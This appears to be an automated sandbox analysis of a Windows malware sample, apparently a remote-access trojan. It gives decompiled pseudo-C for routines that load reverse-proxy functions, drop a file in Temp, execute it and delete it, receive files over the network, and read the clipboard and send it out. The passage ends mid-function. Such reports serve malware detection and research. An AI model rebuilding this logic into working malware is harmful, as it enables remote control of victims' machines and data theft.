                              0x0044dc15
                              0x0044dc1e
                              0x0044dc24
                              0x0044dc29
                              0x00000000
                              0x0044dc2f
                              0x0044dc2f
                              0x0044dc32
                              0x0044dc37
                              0x0044dc3b
                              0x0044dc87
                              0x00000000
                              0x0044dc3d
                              0x0044dc42
                              0x0044dc44
                              0x0044dc46
                              0x0044dc4e
                              0x0044dc6b
                              0x0044dc75
                              0x0044dc77
                              0x0044dc7a
                              0x00000000
                              0x0044dc7c
                              0x0044dc7c
                              0x00000000
                              0x0044dc7c
                              0x0044dc50
                              0x0044dc52
                              0x0044dc56
                              0x0044dc5b
                              0x0044dc5f
                              0x0044dcc1
                              0x0044dcc1
                              0x0044dc61
                              0x0044dc61
                              0x0044dc82
                              0x0044dc82
                              0x0044dc89
                              0x0044dc8b
                              0x00000000
                              0x0044dca4
                              0x0044dca4
                              0x0044dcbd
                              0x0044dcbd
                              0x0044dc8b
                              0x0044dc5f
                              0x0044dc4e
                              0x0044dcc5
                              0x0044dcca
                              0x0044dc29
                              0x0044dc0f
                              0x0044dbf3
                              0x0044dbb8
                              0x0044dba4
                              0x0044dcd1
                              0x0044dcd7
                              0x0044db7f
                              0x0044dac0
                              0x0044da8c
                              0x0044dcd9
                              0x0044dcec

                              APIs
                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044DAF1
                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DB74
                              • __alloca_probe_16.LIBCMT ref: 0044DBAC
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044DD1E,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC07
                              • __alloca_probe_16.LIBCMT ref: 0044DC56
                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC1E
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC9A
                              • __freea.LIBCMT ref: 0044DCC5
                              • __freea.LIBCMT ref: 0044DCD1
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                              • String ID:
                              • API String ID: 3256262068-0
                              • Opcode ID: d1efc3889ecc57394a22abd76ff854e0d4998e8e64a2da47529485e4d0a21682
                              • Instruction ID: 32459ac01eef459e87745deb4d3fcc9efc23f9fccd5395e8f543d2d3ef9bbe94
                              • Opcode Fuzzy Hash: d1efc3889ecc57394a22abd76ff854e0d4998e8e64a2da47529485e4d0a21682
                              • Instruction Fuzzy Hash: 6D91B171E042169AFF208E65CC81EAFBBB5EF09714F14456BE901E7381D769DC40C769
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F248, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 182COMMON
                              Download Yara Rule
                              C-Code - Quality: 65%
                              			E0040F248(char* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t23;
				void* _t29;
				char* _t32;
				intOrPtr _t45;
				char* _t46;
				char* _t53;
				char* _t58;
				intOrPtr _t110;
				void* _t114;
				void* _t115;
				char* _t117;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t132;

				_t134 = __eflags;
				_t101 = __edx;
				_push(_t61);
				_t110 = _a4;
				E004020CC(_t61,  &_v76, __edx, __eflags, _t110 + 0x1c);
				SetEvent( *(_t110 + 0x34));
				_t23 = L00401F75( &_v80);
				E00404286( &_v80,  &_v56, 4, 0xffffffff);
				_t126 = (_t123 & 0xfffffff8) - 0x3c;
				E004020CC(_t61, _t126, _t101, _t134, 0x46c238);
				_t127 = _t126 - 0x18;
				E004020CC(_t61, _t127, _t101, _t134,  &_v72);
				_t29 = L00416DD0( &_v112, _t101);
				_t128 = _t127 + 0x30;
				_t114 =  *_t23 - 0x46;
				if(_t114 == 0) {
					_t32 = E0040A15B(L00401F75(L00401E29( &_v88, _t101, __eflags, 1)));
					_t61 = _t32;
					__eflags = _t32;
					if(__eflags == 0) {
						_t115 = _t128 - 0x18;
						_push("1");
						L19:
						_t101 = L00402F97( &_v32, L00401E29( &_v88, _t101, __eflags, 0), 0x46c238);
						E0040530D(_t61, _t115, _t34, _t110, __eflags);
						_push(0x85);
						L00404A6E(_t61, _t110, _t34, __eflags);
						L00401FA7();
						L20:
						L00401E54( &_v108, _t101);
						L00401FA7();
						L00401FA7();
						return 0;
					}
					_t117 = E0040A1B1(_t61, "StartForward");
					 *0x46bd3c = _t117;
					 *0x46bd38 = E0040A1B1(_t61, "StartReverse");
					 *0x46bd40 = E0040A1B1(_t61, "StopForward");
					_t45 = E0040A1B1(_t61, "StopReverse");
					_t101 = "GetDirectListeningPort";
					 *0x46bd48 = _t45;
					_t46 = E0040A1B1(_t61, "GetDirectListeningPort");
					 *0x46bd44 = _t46;
					__eflags = _t117;
					if(__eflags == 0) {
						L17:
						_t115 = _t128 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x46bd38;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x46bd40;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t46;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x46bd4c = 1;
					E004020CC(_t61, _t128 - 0x18, "GetDirectListeningPort", __eflags, L00401E29( &_v88, "GetDirectListeningPort", __eflags, 0));
					_push(0x76);
					L10:
					L00404A6E(_t61, _t110, _t101, __eflags);
					goto L20;
				}
				_t118 = _t114 - 1;
				if(_t118 == 0) {
					_t53 =  *0x46bd3c(E00436079(_t50, L00401F75(L00401E29( &_v88, _t101, __eflags, 0))));
					_t132 = _t128 - 0x14;
					L9:
					_t101 = _t53;
					L00416B7E(_t61, _t132, _t53);
					_push(0x77);
					goto L10;
				}
				_t119 = _t118 - 1;
				if(_t119 == 0) {
					__imp__#12( *0x46c774);
					_t58 =  *0x46bd38(_t29, E00436079(_t55, L00401F75(L00401E29( &_v92, _t101, __eflags, 0))) & 0x0000ffff);
					__eflags = _t58;
					_t99 =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					 *0x46bd4d =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					_t101 = _t58;
					L00416B7E(_t61, _t128 - 0x10, _t58);
					_push(0x78);
					goto L10;
				}
				_t121 = _t119 - 1;
				if(_t121 == 0) {
					_t53 =  *0x46bd40();
					_t132 = _t128 - 0x18;
					goto L9;
				}
				if(_t121 == 1) {
					 *0x46bd48();
					 *0x46bd4d = 0;
				}
				goto L20;
			}




































                              0x0040f248
                              0x0040f248
                              0x0040f255
                              0x0040f258
                              0x0040f25f
                              0x0040f267
                              0x0040f271
                              0x0040f285
                              0x0040f28a
                              0x0040f294
                              0x0040f299
                              0x0040f2a3
                              0x0040f2ac
                              0x0040f2b1
                              0x0040f2b4
                              0x0040f2b7
                              0x0040f39b
                              0x0040f3a0
                              0x0040f3a2
                              0x0040f3a4
                              0x0040f44f
                              0x0040f451
                              0x0040f456
                              0x0040f472
                              0x0040f476
                              0x0040f47c
                              0x0040f483
                              0x0040f48c
                              0x0040f491
                              0x0040f495
                              0x0040f49e
                              0x0040f4a7
                              0x0040f4b4
                              0x0040f4b4
                              0x0040f3b6
                              0x0040f3bf
                              0x0040f3cf
                              0x0040f3e0
                              0x0040f3e7
                              0x0040f3ec
                              0x0040f3f1
                              0x0040f3f8
                              0x0040f3fd
                              0x0040f402
                              0x0040f404
                              0x0040f440
                              0x0040f443
                              0x0040f445
                              0x00000000
                              0x0040f445
                              0x0040f406
                              0x0040f40d
                              0x00000000
                              0x00000000
                              0x0040f40f
                              0x0040f416
                              0x00000000
                              0x00000000
                              0x0040f418
                              0x0040f41a
                              0x00000000
                              0x00000000
                              0x0040f422
                              0x0040f434
                              0x0040f439
                              0x0040f37b
                              0x0040f37d
                              0x00000000
                              0x0040f37d
                              0x0040f2bd
                              0x0040f2c0
                              0x0040f367
                              0x0040f36d
                              0x0040f370
                              0x0040f370
                              0x0040f374
                              0x0040f379
                              0x00000000
                              0x0040f379
                              0x0040f2c6
                              0x0040f2c9
                              0x0040f2fc
                              0x0040f322
                              0x0040f332
                              0x0040f334
                              0x0040f33a
                              0x0040f340
                              0x0040f344
                              0x0040f349
                              0x00000000
                              0x0040f349
                              0x0040f2cb
                              0x0040f2ce
                              0x0040f2eb
                              0x0040f2f1
                              0x00000000
                              0x0040f2f1
                              0x0040f2d3
                              0x0040f2d9
                              0x0040f2df
                              0x0040f2df
                              0x00000000

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Eventinet_ntoa
                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                              • API String ID: 3578746661-168337528
                              • Opcode ID: b7601ed5fb755dd00a6584ea2e47c4e317154d36a646c6d6260b2f142e433893
                              • Instruction ID: f9a444815650af3872de27879d45234466d6e45f99ea988061a4b43b2ad98d54
                              • Opcode Fuzzy Hash: b7601ed5fb755dd00a6584ea2e47c4e317154d36a646c6d6260b2f142e433893
                              • Instruction Fuzzy Hash: 3351D631A043019BC714BB79DC5AA6E36A59B91318F40453FF801AB6E2EF7C994887DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004136BA, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 73%
                              			E004136BA(void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t87;
				void* _t90;

				_t93 = __eflags;
				_t33 = E00402064(_t60,  &_v136, "\\");
				_t86 = E004075C4(_t60,  &_v112, E0043919A(_t60, __eflags, "Temp"), _t87, _t93, _t33);
				L00402F73(_t60,  &_v28, _t35, _t93,  &_a4);
				L00401FA7();
				_t68 =  &_v136;
				L00401FA7();
				_push(_t68);
				_push(_t68);
				_t41 = E004138F7(E0040D8E4( &_v316, _t35, _t93, L00401F75( &_v28), 0x10),  &_v316);
				_t94 = _t41;
				if(_t41 == 0) {
					E00402064(_t60, _t90 - 0x18, 0x45f6ac);
					_push(0x6f);
					_t73 = 0x46c7e8;
					goto L6;
				} else {
					_t86 =  &_a28;
					E00413907( &_v316,  &_a28, _t94);
					E0040D895( &_v316,  &_a28, _t94);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = L00401F75( &_v28);
					asm("movaps xmm0, [0x466080]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t96 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00402064(_t60, _t90, 0x45f6ac);
						_push(0x70);
						L00404A6E(_t60, 0x46c7e8,  &_a28, _t96);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(L00401F75( &_v28));
					}
					_t97 = _t60 - 1;
					if(_t60 == 1) {
						E00402064(_t60, _t90 - 0x18, 0x45f6ac);
						_push(0x6e);
						_t73 = 0x46c7e8;
						L6:
						L00404A6E(_t60, _t73, _t86, _t97);
					}
				}
				L0040CFAB(_t60,  &_v316, 0x45f6ac);
				L00401FA7();
				L00401FA7();
				return L00401FA7();
			}




















                              0x004136ba
                              0x004136d5
                              0x004136f1
                              0x004136f6
                              0x004136ff
                              0x00413704
                              0x0041370a
                              0x0041370f
                              0x00413710
                              0x0041372d
                              0x00413732
                              0x00413734
                              0x004137f5
                              0x004137fa
                              0x004137fc
                              0x00000000
                              0x0041373a
                              0x0041373a
                              0x00413743
                              0x0041374e
                              0x00413753
                              0x0041375a
                              0x0041375e
                              0x00413765
                              0x0041376c
                              0x00413771
                              0x00413778
                              0x0041377f
                              0x00413795
                              0x00413798
                              0x0041379c
                              0x004137a4
                              0x004137a9
                              0x004137ad
                              0x004137b7
                              0x004137c0
                              0x004137cf
                              0x004137cf
                              0x004137d5
                              0x004137d8
                              0x004137e0
                              0x004137e5
                              0x004137e7
                              0x00413801
                              0x00413801
                              0x00413801
                              0x004137d8
                              0x0041380c
                              0x00413814
                              0x0041381c
                              0x0041382f

                              APIs
                                • Part of subcall function 00413907: __EH_prolog.LIBCMT ref: 0041390C
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,0045F6AC), ref: 004137B7
                              • CloseHandle.KERNEL32(00000000), ref: 004137C0
                              • DeleteFileA.KERNEL32(00000000), ref: 004137CF
                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00413783
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                              • String ID: <$@$Temp
                              • API String ID: 1704390241-1032778388
                              • Opcode ID: 561b6cc24aa72b7d61b651cf218bb8cd61d1741a20a896e296297213a2e5afc7
                              • Instruction ID: 2f37397737ec95128bf32f0f6142d0e98911ade1772a95a98b29c58449e4e073
                              • Opcode Fuzzy Hash: 561b6cc24aa72b7d61b651cf218bb8cd61d1741a20a896e296297213a2e5afc7
                              • Instruction Fuzzy Hash: D3417C719002099ADB14FB61CC56AEEB734AF00319F40417EF505760E2EF7C1B8ACB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040628B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E0040628B(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				E004505A0();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E004032FA(0,  &_v48, __eflags, E00407516( &_v72,  &_a12, __eflags, L".part"));
				L00401ED0();
				_t37 = CreateFileW(L00401ECB( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = L00401ECB( &_a12);
					MoveFileW(L00401ECB( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = L00404B24( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E0040208B(_t58, _t82, _t74, _t85,  &_v12, 8);
								L00404A6E(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(L00401ECB( &_v48));
						}
					}
				}
				L9:
				L00401ED0();
				L00401ED0();
				return _t58;
			}





















                              0x00406293
                              0x0040629c
                              0x004062a0
                              0x004062a3
                              0x004062a6
                              0x004062a8
                              0x004062b5
                              0x004062c2
                              0x004062ca
                              0x004062e4
                              0x004062ed
                              0x004062f0
                              0x004062f3
                              0x00406365
                              0x00406366
                              0x0040636f
                              0x0040637e
                              0x00406384
                              0x004062f5
                              0x004062f5
                              0x004062f8
                              0x00000000
                              0x004062fa
                              0x004062fa
                              0x004062fd
                              0x00000000
                              0x004062ff
                              0x004062ff
                              0x004062ff
                              0x0040630e
                              0x00406313
                              0x00406315
                              0x00406316
                              0x0040631d
                              0x0040632c
                              0x00406332
                              0x0040633d
                              0x00406347
                              0x0040634e
                              0x00000000
                              0x00000000
                              0x00406356
                              0x00406359
                              0x00000000
                              0x00406362
                              0x00406362
                              0x00000000
                              0x00406362
                              0x00000000
                              0x00406359
                              0x004063a2
                              0x004063b1
                              0x004063b1
                              0x004062fd
                              0x004062f8
                              0x00406386
                              0x00406389
                              0x00406391
                              0x0040639e

                              APIs
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 004062E4
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 0040632C
                              • CloseHandle.KERNEL32(00000000), ref: 00406366
                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0040637E
                              • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 004063A2
                              • DeleteFileW.KERNEL32(00000000), ref: 004063B1
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                              • String ID: .part
                              • API String ID: 820096542-3499674018
                              • Opcode ID: 0b08d7c8f89f4ae88afe83d6d6890c2d5d8692f079fd1b54d9283a4737391721
                              • Instruction ID: d9bd7d9a32dec13802f65ee1536d1b778e09315ea91cc40d0f5a3459ff757ad6
                              • Opcode Fuzzy Hash: 0b08d7c8f89f4ae88afe83d6d6890c2d5d8692f079fd1b54d9283a4737391721
                              • Instruction Fuzzy Hash: 10314971D00219AFCB10EFA5DD569EEB778FB44356F10847AF812B3191DA34AA44CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044326D, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                              Download Yara Rule
                              C-Code - Quality: 69%
                              			E0044326D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46a00c; // 0x5d382218
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = L0043EE69(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0042F61B(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E004304BD(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0044132F(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E004304BD(_t101);
									goto L36;
								}
								_t62 = E0044132F(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E004304BD(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E0043E61D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00450080();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0044132F(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0043E61D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00450080();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























                              0x00443272
                              0x00443273
                              0x00443274
                              0x0044327b
                              0x0044327f
                              0x00443280
                              0x00443286
                              0x0044328c
                              0x00443292
                              0x00443295
                              0x00443295
                              0x00443298
                              0x0044329a
                              0x0044329a
                              0x00443298
                              0x0044329c
                              0x004432a1
                              0x004432a8
                              0x004432ab
                              0x004432ab
                              0x004432c7
                              0x004432cd
                              0x004432d2
                              0x00443465
                              0x00443478
                              0x004432d8
                              0x004432d8
                              0x004432db
                              0x004432e0
                              0x004432e4
                              0x00443338
                              0x00443338
                              0x0044333a
                              0x0044333c
                              0x0044345a
                              0x0044345a
                              0x0044345c
                              0x0044345d
                              0x00000000
                              0x00443463
                              0x0044334d
                              0x00443353
                              0x00443355
                              0x00000000
                              0x00000000
                              0x0044335b
                              0x0044336d
                              0x00443372
                              0x00443376
                              0x00000000
                              0x00000000
                              0x00443383
                              0x004433bd
                              0x004433c0
                              0x004433c3
                              0x004433c5
                              0x004433c7
                              0x004433c9
                              0x00443415
                              0x00443415
                              0x00443417
                              0x00443417
                              0x00443419
                              0x00443453
                              0x00443454
                              0x00000000
                              0x00443459
                              0x0044342d
                              0x00443432
                              0x00443434
                              0x00000000
                              0x00000000
                              0x00443438
                              0x00443439
                              0x0044343a
                              0x0044343d
                              0x00443479
                              0x0044347c
                              0x0044343f
                              0x0044343f
                              0x00443440
                              0x00443440
                              0x0044344d
                              0x0044344f
                              0x00443451
                              0x00443482
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00443451
                              0x004433cb
                              0x004433ce
                              0x004433d0
                              0x004433d2
                              0x004433d4
                              0x004433d7
                              0x004433dc
                              0x004433f7
                              0x004433f9
                              0x00443403
                              0x00443405
                              0x00443406
                              0x00443408
                              0x00000000
                              0x00000000
                              0x0044340a
                              0x00443410
                              0x00443410
                              0x00000000
                              0x00443410
                              0x004433de
                              0x004433e0
                              0x004433e4
                              0x004433e9
                              0x004433eb
                              0x004433ed
                              0x00000000
                              0x00000000
                              0x004433ef
                              0x00000000
                              0x004433ef
                              0x00443385
                              0x0044338a
                              0x00000000
                              0x00000000
                              0x00443390
                              0x00443392
                              0x00000000
                              0x00000000
                              0x004433a9
                              0x004433ae
                              0x004433b2
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004433b8
                              0x004432eb
                              0x004432ed
                              0x004432ef
                              0x004432f7
                              0x00443316
                              0x00443318
                              0x00443322
                              0x00443324
                              0x00443325
                              0x00443327
                              0x00000000
                              0x00000000
                              0x0044332d
                              0x00443333
                              0x00443333
                              0x00000000
                              0x00443333
                              0x004432fb
                              0x004432ff
                              0x00443304
                              0x00443308
                              0x00000000
                              0x00000000
                              0x0044330e
                              0x00000000
                              0x0044330e

                              APIs
                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 004432C7
                              • __alloca_probe_16.LIBCMT ref: 004432FF
                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 0044334D
                              • __alloca_probe_16.LIBCMT ref: 004433E4
                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00443447
                              • __freea.LIBCMT ref: 00443454
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F
                              • __freea.LIBCMT ref: 0044345D
                              • __freea.LIBCMT ref: 00443482
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                              • String ID:
                              • API String ID: 2597970681-0
                              • Opcode ID: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
                              • Instruction ID: 0cad5e9ef2b3b2de0836d9d1cfed8af2ee8cc4fd49053d42945b5b1fc1f44aaa
                              • Opcode Fuzzy Hash: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
                              • Instruction Fuzzy Hash: 1F511672A00216ABFB264E61DC41EEF77A9EB44B56F14466AFD04D6280DB3CDD408698
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00412724, Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON
                              Download Yara Rule
                              C-Code - Quality: 80%
                              			E00412724(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				void* _t16;
				struct HWND__* _t23;
				void* _t38;
				void* _t41;

				if(OpenClipboard(_t23) != 0) {
					EmptyClipboard();
					CloseClipboard();
					if(OpenClipboard(_t23) != 0) {
						_t38 = GetClipboardData(0xd);
						_t16 = GlobalLock(_t38);
						GlobalUnlock(_t38);
						CloseClipboard();
						_t29 =  !=  ? _t16 : 0x45f714;
						E0040425F(_t23,  &_a36,  !=  ? _t16 : 0x45f714);
						_t34 =  &_a32;
						L00416CF4(_t23, _t41 - 0x18,  &_a32);
						_push(0x6b);
						L00404A6E(_t23, 0x46c768,  &_a32, _t16);
						L00401ED0();
					}
				}
				L00401E54( &_a16, _t34);
				L00401FA7();
				L00401FA7();
